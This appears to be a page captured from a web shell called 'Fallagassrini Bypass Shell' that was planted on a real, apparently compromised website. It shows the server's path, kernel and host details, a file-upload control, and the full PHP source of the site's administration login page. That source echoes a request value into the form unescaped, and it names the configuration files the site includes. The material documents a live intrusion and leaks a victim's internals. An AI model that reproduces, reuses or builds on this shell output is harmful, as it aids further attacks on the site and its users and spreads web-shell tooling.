Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/happyrenas/myreco.online/administration/gestion/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/happyrenas/myreco.online/administration/gestion/login.php

<?
set_include_path(get_include_path() . PATH_SEPARATOR . __DIR__ . '/../');
include("../../configuration.php");
include("../../includes/fonctions.php");
setlocale(LC_TIME, 'fr_FR.UTF-8');

$mail_recuperation								= $db->escape($_REQUEST['mail_recuperation']);
$password_recuperation							= $db->escape($_REQUEST['password_recuperation']);
$logout											= $db->escape($_REQUEST['logout']);
$page="login";
include("auth.php");
?>
<!DOCTYPE html>

<html lang="fr">
	<!--begin::Head-->
	<head>
		<meta charset="utf-8" />
		<title><?echo $titre_application;?></title>
		<meta name="description" content="Login page example" />
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
		<!--begin::Fonts-->
		<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700" />
		<!--end::Fonts-->
		<!--begin::Page Custom Styles(used by this page)-->
		<link href="../assets/css/pages/login/login-1.css" rel="stylesheet" type="text/css" />
		<!--end::Page Custom Styles-->
		<!--begin::Global Theme Styles(used by all pages)-->
		<link href="../assets/plugins/global/plugins.bundle.css" rel="stylesheet" type="text/css" />
		<link href="../assets/plugins/custom/prismjs/prismjs.bundle.css" rel="stylesheet" type="text/css" />
		<link href="../assets/css/style.bundle.css" rel="stylesheet" type="text/css" />
		<!--end::Global Theme Styles-->
		<!--begin::Layout Themes(used by all pages)-->
		
		<!--end::Layout Themes-->
		<link rel="shortcut icon" href="<?echo $icone;?>" />
	</head>
	<!--end::Head-->
	<!--begin::Body-->
	<body id="kt_body" class="header-fixed header-mobile-fixed subheader-enabled subheader-fixed aside-enabled aside-fixed aside-minimize-hoverable page-loading">
		<!--begin::Main-->
		<div class="d-flex flex-column flex-root">
			<!--begin::Login-->
			<div class="login login-1 login-signin-on d-flex flex-column flex-lg-row flex-column-fluid bg-white" id="kt_login">
				<!--begin::Aside-->
				<div class="login-aside d-flex flex-column flex-row-auto" style="background-color: #172338;">
					<!--begin::Aside Top-->
					<div class="d-flex flex-column-auto flex-column pt-lg-40 pt-15">
						<!--begin::Aside header-->
						<a href="#" class="text-center mb-10">
							<!--<img src="img/logomark.png" class="max-h-250px" alt="" />-->
						</a>
						<!--end::Aside header--> 
						<!--begin::Aside title-->
						<h3 class="font-weight-bolder text-center font-size-h4 font-size-h1-lg"  style="color: #E9E9E7;">MYRECO <br>Gestion </h3>
						<!--end::Aside title-->
					</div>
					<!--end::Aside Top-->
					<!--begin::Aside Bottom-->
					
					<div class="aside-img d-flex flex-row-fluid bgi-no-repeat bgi-position-y-bottom bgi-position-x-center"></div>
					<!--end::Aside Bottom-->
				</div>
				<!--begin::Aside-->
				<!--begin::Content-->
				<div class="login-content flex-row-fluid d-flex flex-column justify-content-center position-relative overflow-hidden p-7 mx-auto">
					<!--begin::Content body-->
					<div class="d-flex flex-column-fluid flex-center">
						<!--begin::Signin-->
						<div class="login-form login-signin">
							<!--begin::Form-->
							<form class="form" action="login.php" method="post" id="kt_login_signin_form">
							<input type="hidden" name="remember_me_recuperation" value="1">
								<!--begin::Title-->
							
							<div class="pb-13 pt-lg-0 pt-5">
									<h3 class="font-weight-bolder text-dark font-size-h4 font-size-h1-lg">MyReco</h3>
									<span class="text-muted font-weight-bold font-size-h4">Etablissement </span>
								</div>
								<!--begin::Title-->
								<!--begin::Form group-->
								<div class="form-group">
									<label class="font-size-h6 font-weight-bolder text-dark">Login</label>
									<input class="form-control form-control-solid h-auto py-6 px-6 rounded-lg" tabindex=1 type="text" value="<?echo $mail_recuperation;?>" name="mail_recuperation"  autocomplete="off" required />
								</div>
								<!--end::Form group-->
								<!--begin::Form group-->
								<div class="form-group">
									<div class="d-flex justify-content-between mt-n5">
										<label class="font-size-h6 font-weight-bolder text-dark pt-5">Mot de passe </label>
										
									</div>
									<input class="form-control form-control-solid h-auto py-6 px-6 rounded-lg"  tabindex=2 type="password" name="password_recuperation" autocomplete="off" required />
								</div>
								<!--end::Form group-->
								<!--begin::Action-->
								<div class="pb-lg-0 pb-5">
									<button type="submit" id="kt_login_signin_submit" class="btn btn-light-success font-weight-bolder font-size-h6 px-8 py-4 my-3 mr-3">Connexion</button><br>
									<?if ($recuperation==2) {?><div class="alert alert-danger" role="alert">Compte introuvable</div><?}?>
									<?if ($resultat) {?><div class="alert alert-danger" role="alert"><?echo $resultat;?></div><?}?>
									
								</div>
								
								<!--end::Action-->
							</form>
							<!--end::Form-->
						</div>
						<!--end::Signin-->
						<!--begin::Signup-->
						
						<!--end::Signup-->
						<!--begin::Forgot-->
						<!--end::Forgot-->
					</div>
					
					<!--end::Content body-->
					<!--begin::Content footer-->
					<div class="d-flex justify-content-lg-start justify-content-center align-items-end py-7 py-lg-0">
						<div class="text-dark-50 font-size-lg font-weight-bolder mr-10">
							<span class="mr-1">2025</span>
						</div>
					</div>
					
					
					<!--end::Content footer-->
				</div>
				<!--end::Content-->
			</div>
			<!--end::Login-->
		</div>
		<!--end::Main-->

		<!--begin::Global Config(global config for global JS scripts)-->
		<script src="../js/global.js"></script>
		<!--end::Global Config-->
		<!--begin::Global Theme Bundle(used by all pages)-->
		<script src="../assets/plugins/global/plugins.bundle.js?v=7.1.1"></script>
		<script src="../assets/plugins/custom/prismjs/prismjs.bundle.js?v=7.1.1"></script>
		<script src="../assets/js/scripts.bundle.js?v=7.1.1"></script>
		<!--end::Global Theme Bundle-->
		<!--begin::Page Scripts(used by this page)-->
				

		<!--end::Page Scripts-->
	</body>
	<!--end::Body-->
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net